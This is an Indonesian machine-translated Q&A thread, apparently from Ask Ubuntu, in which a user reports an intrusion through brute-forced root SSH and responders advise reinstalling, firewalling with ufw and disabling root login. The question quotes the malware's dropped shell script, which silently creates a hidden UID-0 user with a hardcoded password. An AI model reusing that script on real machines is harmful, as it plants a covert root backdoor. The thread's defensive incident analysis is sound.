Bagaimana cara mengatasi malware di laptop saya?

12

Saya cukup yakin bahwa laptop Ubuntu 13.10 saya terinfeksi semacam malware.

Sesekali, saya menemukan proses / lib / sshd (dimiliki oleh root) berjalan dan mengkonsumsi banyak cpu. Ini bukan server sshd yang menjalankan / usr / sbin / sshd.

Biner memiliki izin --wxrw-rwt dan menghasilkan dan memunculkan skrip di direktori / lib. Yang baru-baru ini dinamai 13959730401387633604 dan melakukan yang berikut

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

Pengguna gusr dibuat oleh malware secara independen, dan kemudian chpasswd hang saat mengkonsumsi 100% cpu.

Sejauh ini, saya telah mengidentifikasi bahwa pengguna gusr juga ditambahkan ke file di / etc /

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

Sepertinya malware membuat salinan semua file ini dengan akhiran "-". Daftar lengkap file / etc / yang dimodifikasi oleh root tersedia di sini .

Selain itu, file / etc / hosts telah diubah ke file ini .

/ Lib / sshd dimulai dengan menambahkan dirinya ke akhir file /etc/init.d/rc.local!

Saya telah menghapus pengguna, menghapus file, membunuh pohon yang diproses, mengubah passwor saya dan menghapus kunci publik ssh.

Saya sadar bahwa saya pada dasarnya kacau, dan kemungkinan besar saya akan menginstal ulang seluruh sistem. Namun demikian, karena saya masuk ke beberapa mesin lain, akan lebih baik untuk setidaknya mencoba menghapusnya, dan mencari tahu bagaimana saya mendapatkannya. Setiap saran tentang cara melakukannya akan sangat dihargai.

Sepertinya mereka masuk pada tanggal 25 Maret dengan login root dengan kasar. Saya tidak tahu bahwa root ssh diaktifkan secara default di Ubuntu. Saya menonaktifkannya dan memasang denyhosts.

Info masuk berasal dari 59.188.247.236, tampaknya di suatu tempat di Hong Kong.

Saya mendapatkan laptop dari EmperorLinux, dan mereka mengaktifkan akses root. Jika Anda memiliki salah satunya dan Anda menjalankan sshd waspadalah.

security  malware 
Dejan Jovanović
sumber
2
Matikan mesin Anda dari jaringan! Sekarang!
Seth
2
Dan mengapa Anda mengaktifkan login root? Itu sesuatu yang seharusnya tidak Anda aktifkan tanpa alasan yang bagus.
Seth
@Kalau saya tidak mengaktifkannya, ia aktif secara default di Ubuntu. Saya sama terkejutnya dengan Anda.
Dejan Jovanović
1
Lihat " Secara default, daemon SSH dikirimkan dengan login root jarak jauh diaktifkan. Biasanya Ubuntu tidak mengizinkan akses langsung ke pengguna root, jadi pengaturan ini tidak penting. Jika Anda telah menetapkan kata sandi pada akun root, pengaturan ini dapat berpotensi. risiko keamanan, dan harus dinonaktifkan. "
Seth
1
Saya cukup yakin bahwa ini bukan Linux/Ebury. Ini sesuatu yang lain, dan mungkin tidak memiliki nama yang ditetapkan. Ebury tidak akan membuat akun pengguna baru, dan akan memodifikasi pustaka bersama yang digunakan oleh openssh, tidak dijatuhkan dalam biner baru bernama sshd.
Bersepeda

Jawaban:

11

Pertama, lepaskan mesin itu dari jaringan sekarang!

Kedua, mengapa Anda mengaktifkan akun root? Anda benar-benar tidak boleh mengaktifkan akun root kecuali Anda memiliki alasan yang sangat bagus untuk melakukannya.

Ketiga, ya, satu-satunya cara untuk memastikan Anda bersih adalah dengan melakukan instalasi bersih. Anda juga disarankan untuk memulai dari awal dan jangan kembali ke cadangan, karena Anda tidak pernah bisa memastikan kapan semuanya dimulai.

Saya juga menyarankan agar Anda membuat firewall pada instalasi berikutnya dan menolak semua koneksi yang masuk: 

sudo ufw default deny incoming

dan kemudian izinkan ssh dengan: 

sudo ufw allow ssh

dan JANGAN aktifkan akun root! Tentunya pastikan login root ssh dinonaktifkan.

Seth
sumber
4
Saya memeriksa akun root. Saya mendapatkan laptop dari Emperorlinux dan mereka mengaktifkan akun untuk mengaturnya. Bodoh.
Dejan Jovanović
1
@ DejanJovanović Itu mengerikan!
Seth
Dengan menggunakan situs kami, Anda mengakui telah membaca dan memahami Kebijakan Cookie dan Kebijakan Privasi kami.
Licensed under cc by-sa 3.0 with attribution required.